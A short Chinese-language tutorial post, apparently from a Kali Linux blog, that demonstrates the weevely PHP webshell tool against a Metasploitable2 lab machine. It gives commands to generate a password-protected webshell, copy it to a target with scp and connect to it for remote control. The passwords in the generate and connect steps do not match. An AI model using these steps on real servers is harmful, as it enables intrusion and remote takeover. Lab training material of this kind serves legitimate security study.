weevely 是kali中的php webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!并且携带了大量的管理模块,为渗透带来了更多的惊喜与便利!下面我们来实例演示, weevely 的具体使用。

准备环境:

  • kali linux
  • Metasploitables2

首先还是先制作一个 webshell ,密码为 bbskali

weevely generate bbskali secist.php

可以看到,很快就为我们生成了一个大小1000多字节的 webshell 。

我们使用 cat 命令简单查看下 webshell 的内容:

cat /usr/share/weevely/secist.php

请输入图片描述
现在我将生成的 webshell 远程拷贝到目标机器上:

scp /usr/share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin

或者上传PHP木马

连接一句话木马

weevely http://192.168.30.128/secist.php secist

Last modification:May 4th, 2018 at 02:24 pm
正在沿街乞讨中……